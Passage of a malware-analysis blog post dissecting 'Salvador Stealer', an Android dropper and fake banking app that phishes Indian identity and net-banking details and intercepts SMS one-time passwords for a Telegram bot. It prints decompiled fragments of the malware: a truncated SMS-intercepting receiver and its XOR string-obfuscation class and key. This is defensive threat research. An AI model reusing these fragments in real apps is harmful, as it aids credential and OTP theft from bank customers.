{"id":12413,"date":"2025-04-01T10:50:42","date_gmt":"2025-04-01T10:50:42","guid":{"rendered":"\/cybersecurity-blog\/?p=12413"},"modified":"2025-04-02T05:49:54","modified_gmt":"2025-04-02T05:49:54","slug":"salvador-stealer-malware-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","title":{"rendered":"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs"},"content":{"rendered":"\n<p>In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. During the analysis, we came across internal references to <strong>&#8220;Salvador,&#8221;<\/strong> so we decided to name it Salvador Stealer.&nbsp;<\/p>\n\n\n\n<p>Real-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app providers. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data, highlighting the need for dynamic malware analysis solutions.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Salvador Stealer Overview&nbsp;<\/h2>\n\n\n\n<p>The collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking app. 
Its primary goal is to collect sensitive user information, including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Registered mobile number<\/li>\n<li>Aadhaar number<\/li>\n<li>PAN card details<\/li>\n<li>Date of birth<\/li>\n<li>Net banking user ID and password<\/li>\n<\/ul>\n\n\n\n<p>It embeds a phishing website inside the <a href=\"https:\/\/any.run\/cybersecurity-blog\/android-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Android application<\/a> to trick users into entering their credentials. Once submitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram.&nbsp;<\/p>\n\n\n\n<p>In this technical breakdown, we\u2019ll walk you through how this malware operates, how it maintains persistence, and how it exfiltrates sensitive data in real time.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Key Takeaways&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Multi-Stage Attack Chain:<\/strong>&nbsp;Salvador Stealer uses a two-stage infection process: a dropper APK installs and launches the actual banking stealer payload.<\/li>\n<li><strong>Phishing-Based Credential Theft:<\/strong>&nbsp;The malware embeds a phishing website within the Android app to collect sensitive personal and banking information, including Aadhaar number, PAN card details, and net banking credentials.<\/li>\n<li><strong>Real-Time Data Exfiltration:<\/strong>&nbsp;Stolen credentials are immediately sent to both a phishing server and a Command and Control (C2) server via the <a href=\"https:\/\/any.run\/cybersecurity-blog\/intercept-stolen-data-in-telegram\/\" target=\"_blank\" rel=\"noreferrer noopener\">Telegram Bot API<\/a>.<\/li>\n<li><strong>SMS Interception &amp; OTP Theft:<\/strong>&nbsp;Salvador Stealer abuses SMS permissions to capture incoming OTPs and banking verification codes, helping attackers bypass two-factor authentication.<\/li>\n<li><strong>Multiple Exfiltration Channels:<\/strong>&nbsp;The malware forwards stolen SMS data via dynamic SMS forwarding and HTTP POST requests, so the data reaches the attacker even if one channel fails.<\/li>\n<li><strong>Persistence Mechanisms:<\/strong>&nbsp;Salvador Stealer automatically <a href=\"https:\/\/any.run\/cybersecurity-blog\/6-persistence-mechanisms-in-malware\/\" target=\"_blank\" rel=\"noreferrer noopener\">restarts itself<\/a> if stopped and survives device reboots by registering system-level broadcast receivers.<\/li>\n<li><strong>Exposed Infrastructure:<\/strong>&nbsp;During analysis, we found the phishing infrastructure and admin panel publicly accessible, exposing an attacker\u2019s WhatsApp contact and suggesting a possible link to India.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Malware Behavior Analysis&nbsp;<\/h2>\n\n\n\n<p>To uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample inside&nbsp;<a href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoregistration#register\/\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s new Android sandbox.<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/fe800ccb-fccc-42a6-a11d-a3d2b6e89edf\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoservice\" target=\"_blank\" 
rel=\"noreferrer noopener\">View the full analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"578\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-1024x578.png\" alt=\"\" class=\"wp-image-12433\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-1024x578.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-768x433.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-1536x867.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-370x209.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador-740x418.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/analysisofsalvador.png 1852w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Analysis of the Salvador malware inside ANY.RUN Sandbox&#8217;s interactive Android VM<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This interactive environment allowed us to quickly analyze the malware\u2019s behavior, visualize its activity, and identify key indicators, all while saving significant analysis time.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Malware Structure&nbsp;<\/h2>\n\n\n\n<p>The malware consists of two key components:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Dropper APK<\/strong>&nbsp;\u2013 Installs and triggers the second-stage payload.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Base.apk (Payload)<\/strong>&nbsp;\u2013 The actual banking credential stealer responsible for data theft.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Dropper APK Behavior&nbsp;<\/h3>\n\n\n\n<p>The dropper APK is designed to silently install and execute the malicious payload. 
To enable this, it declares specific permissions and intent filters in its&nbsp;AndroidManifest.xml, including:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"288\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-1024x288.png\" alt=\"\" class=\"wp-image-12435\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-1024x288.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-300x84.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-768x216.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-1536x432.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-370x104.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-270x76.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec-740x208.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagec.png 1872w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>AndroidManifest.xml<\/em><\/figcaption><\/figure><\/div>\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">&lt;uses-permission android:name=\"android.permission.REQUEST_INSTALL_PACKAGES\"\/&gt;\n\nand\n\n&lt;intent-filter&gt;\n    &lt;action android:name=\"com.example.android.apis.content.SESSION_API_PACKAGE_INSTALLED\" android:exported=\"true\"\/&gt;\n&lt;\/intent-filter&gt;<\/code><\/pre>\n\n\n\n<p>REQUEST_INSTALL_PACKAGES lets the app hand another APK to the system package installer, and SESSION_API_PACKAGE_INSTALLED is the action name the app registers for the PackageInstaller session status callback (the same name used in Android\u2019s sample code), so the dropper is notified as soon as the payload install completes and can launch it. This behavior was clearly observed in our sandbox environment, where the malware launched a new activity immediately after execution.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"732\" height=\"554\" 
src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged.png\" alt=\"\" class=\"wp-image-12436\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged.png 732w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-300x227.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-370x280.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-270x204.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imaged-80x60.png 80w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><figcaption class=\"wp-element-caption\"><em>The dropper APK designed to install and launch a secondary payload (base.apk) as a new activity<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>If we open the initial dropper APK using WinRAR, we can see base.apk, which serves as the actual malicious payload. The dropper APK is responsible for dropping and launching this payload without the victim\u2019s knowledge.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"767\" height=\"111\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee.png\" alt=\"\" class=\"wp-image-12438\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee.png 767w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-300x43.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-370x54.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-270x39.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/imagee-740x107.png 740w\" sizes=\"(max-width: 767px) 100vw, 767px\" \/><figcaption class=\"wp-element-caption\"><em>Base.apk displayed inside the initial dropper APK using WinRAR<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Once 
executed,&nbsp;base.apk&nbsp;exhibits several key behaviors:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It establishes a connection to&nbsp;<strong>Telegram<\/strong>, which the attackers use as a&nbsp;Command and Control (C2) server&nbsp;to receive stolen data and manage the infection.<\/li>\n<li>It triggers the signature&nbsp;<strong>&#8220;Starts itself from another location,&#8221;<\/strong>&nbsp;confirming that it was dropped and launched by the initial dropper APK rather than being installed directly.<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"725\" height=\"496\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12.png\" alt=\"\" class=\"wp-image-12440\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12.png 725w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12-300x205.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12-370x253.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image12-270x185.png 270w\" sizes=\"(max-width: 725px) 100vw, 725px\" \/><figcaption class=\"wp-element-caption\"><em>Process communicating with Telegram revealed inside ANY.RUN Android sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Phishing Interface &amp; Data Theft&nbsp;<\/h2>\n\n\n\n<p>Salvador Stealer tricks users into entering their banking credentials through a phishing page, styled as a banking interface, that is embedded in the app.&nbsp;<\/p>\n\n\n\n<p>Once the user submits their credentials, the data is immediately sent to both the phishing server and a Telegram bot that serves as the C2.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 1: Collecting Personal Information<\/h3>\n\n\n\n<p>On the first page, the app prompts the user to enter:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Registered mobile number<\/li>\n<li>Aadhaar number<\/li>\n<li>PAN card details<\/li>\n<li>Date of birth<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"356\" height=\"585\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image.png\" alt=\"\" class=\"wp-image-12414\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image.png 356w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-183x300.png 183w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-270x444.png 270w\" sizes=\"(max-width: 356px) 100vw, 356px\" \/><figcaption class=\"wp-element-caption\"><em>The interface of the fake banking app displayed inside ANY.RUN Android sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Once this information is submitted, it is immediately sent to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A phishing website controlled by the attacker&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"623\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-1024x623.png\" alt=\"\" class=\"wp-image-12443\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-1024x623.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-270x164.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18-740x450.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image18.png 1051w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to phishing site<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>A&nbsp;Telegram bot&nbsp;used as part of the malware&#8217;s C2 infrastructure&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"623\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-1024x623.png\" alt=\"\" class=\"wp-image-12445\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-1024x623.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11-740x450.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image11.png 1046w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to Telegram C2 server<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Step 2: Stealing Banking Credentials&nbsp;<\/h3>\n\n\n\n<p>On the next stage, the app asks the user to provide:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Net banking user ID&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Password&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter 
size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"353\" height=\"585\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a.png\" alt=\"\" class=\"wp-image-12449\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a.png 353w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a-181x300.png 181w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1a-270x447.png 270w\" sizes=\"(max-width: 353px) 100vw, 353px\" \/><figcaption class=\"wp-element-caption\"><em>Banking credentials provided to cyber attackers<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>This data is also exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside ANY.RUN Android sandbox: &nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-1024x625.png\" alt=\"\" class=\"wp-image-12451\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-1024x625.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-300x183.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-768x469.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-370x226.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-270x165.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14-740x452.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image14.png 1044w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to phishing site<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>These credential theft attempts were clearly captured in the&nbsp;HTTP 
request logs&nbsp;during sandbox analysis.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"624\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-1024x624.png\" alt=\"\" class=\"wp-image-12453\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-1024x624.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-300x183.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-768x468.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-370x226.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-270x165.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e-740x451.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1e.png 1045w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stolen data sent to Telegram C2 server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>By enabling&nbsp;HTTPS MITM Proxy mode&nbsp;in <a href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoregistration#register\/\">ANY.RUN\u2019s Android sandbox<\/a>, we were able to intercept and verify the exfiltration of user data in real time.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"213\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-1024x213.png\" alt=\"\" class=\"wp-image-12455\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-1024x213.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-300x63.png 300w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-768x160.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-370x77.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-270x56.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f-740x154.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image1f.png 1128w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Credential theft attempts captured in the&nbsp;HTTP request logs<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Technical Analysis&nbsp;<\/h2>\n\n\n\n<p>The&nbsp;<strong>base.apk<\/strong>&nbsp;file embedded in the dropper APK contains the core malicious functionality of Salvador Stealer. Here&#8217;s a detailed look at its structure:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"471\" height=\"588\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2.png\" alt=\"\" class=\"wp-image-12417\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2.png 471w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2-240x300.png 240w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2-370x462.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image-2-270x337.png 270w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><figcaption class=\"wp-element-caption\"><em>Base.apk file structure<\/em><\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Encrypted Strings &amp; Obfuscation<\/h3>\n\n\n\n<p>We\u2019ll begin by opening one of the Java files to analyze its contents. 
Let&#8217;s start with Earnestine.java.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap;\">public class Earnestine extends BroadcastReceiver {\n\n    private static final Map&lt;String, StringBuilder&gt; sdghedy = new ConcurrentHashMap();\n\n    @Override \/\/ android.content.BroadcastReceiver\n    public void onReceive(Context context, Intent intent) {\n        Object&#91;] pdus;\n        if (intent.getAction().equals(NPStringFog.decode(\"0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C3D3D3E3E3C2424203B383529\")) &amp;&amp; (pdus = (Object&#91;]) intent.getExtras().get(NPStringFog.decode(\"1E141812\"))) != null) {\n            for (Object pdu : pdus) {\n...<\/code><\/pre>\n\n\n\n<p>We can see that the strings are encrypted using a custom method. The decryption is performed by NPStringFog.decode(&#8230;), defined in the NPStringFog.java class.<\/p>\n\n\n\n<p>Let\u2019s examine that next to understand what type of encryption is used.&nbsp;<\/p>\n\n\n\n<p>Opening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: &#8220;npmanager&#8221;.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">package obfuse; \n \nimport java.io.ByteArrayOutputStream; \n \npublic class NPStringFog { \n    public static String KEY = \"npmanager\";  \/\/ XOR key \n    private static final String hexString = \"0123456789ABCDEF\";  \/\/ Hexadecimal string for conversion \n \n    public static String decode(String str) { \n        ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() \/ 2); \n         \n        \/\/ Convert hex string to byte array \n        for (int i = 0; i &lt; str.length(); i += 2) { \n            baos.write((hexString.indexOf(str.charAt(i)) &lt;&lt; 4) | hexString.indexOf(str.charAt(i + 1))); \n        } \n         \n        byte&#91;] b = baos.toByteArray(); \n        int len = b.length; \n        
int keyLen = KEY.length(); \n         \n        \/\/ XOR decryption \n        for (int i2 = 0; i2 &lt; len; i2++) { \n            b&#91;i2] = (byte) (b&#91;i2] ^ KEY.charAt(i2 % keyLen));  \/\/ XOR byte with key \n        } \n         \n        return new String(b); \n    } \n} <\/code><\/pre>\n\n\n\n<p>This confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one found in Earnestine. Decoded with this key, the first Earnestine string is android.provider.Telephony.SMS_RECEIVED and the second is pdus, which identifies that receiver as the component that intercepts incoming SMS messages.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"490\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-1024x490.png\" alt=\"\" class=\"wp-image-12459\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-1024x490.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-300x144.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-768x367.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-1536x735.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-370x177.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-270x129.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21-740x354.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image21.png 1919w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Decoding strings with the help of CyberChef<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>CyberChef recipe (From Hex, then XOR with the Latin1 key npmanager):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: 
pre-wrap\">https%3A%2F%2Fgchq.github.io%2FCyberChef%2F%23recipe%3DFrom_Hex%28%27Auto%27%29XOR%28%257B%27option%27%3A%27Latin1%27%2C%27string%27%3A%27npmanager%27%257D%2C%27Standard%27%2Cfalse%29%26input%3DMEYxRTA5MTMwMTA4MDM0QjAyMUMxRjFCMDgwQTA0MTU0QjI2MEIxQzA4MTEwNjBFMDkxQzVDM0QzRDNFM0UzQzI0MjQyMDNCMzgzNTI5<\/code><\/pre>\n\n\n\n<p>To analyze the rest of the APK effectively, we\u2019ll need to decode all encrypted strings automatically. Here\u2019s a Python script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method, and writes the result to a _decoded.java file.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">import re \nimport os \n \ndef decode_npstringfog(encoded: str, key: str = \"npmanager\") -&gt; str: \n    b = bytearray() \n    for i in range(0, len(encoded), 2): \n        b.append(int(encoded&#91;i:i+2], 16)) \n    key_bytes = key.encode() \n    return bytearray((b&#91;i] ^ key_bytes&#91;i % len(key_bytes)]) for i in range(len(b))).decode(errors=\"replace\") \n \ndef decode_and_save(filepath: str): \n    with open(filepath, \"r\", encoding=\"utf-8\") as f: \n        content = f.read() \n \n    # Find all NPStringFog.decode(\"...\") \n    pattern = re.compile(r'NPStringFog\\.decode\\(\"(&#91;0-9A-F]+)\"\\)') \n    if not pattern.search(content): \n        return \n \n    decoded_content = pattern.sub(lambda m: f'\"{decode_npstringfog(m.group(1))}\"', content) \n \n    outpath = filepath.replace(\".java\", \"_decoded.java\") \n    with open(outpath, \"w\", encoding=\"utf-8\") as f: \n        f.write(decoded_content) \n    print(f\"&#91;+] Decoded file written: {outpath}\") \n \ndef walk_and_decode(base_dir: str = \".\"): \n    for root, _, files in os.walk(base_dir): \n        for file in files: \n            if file.endswith(\".java\"): \n                full_path = os.path.join(root, file) \n                decode_and_save(full_path) \n \nwalk_and_decode() 
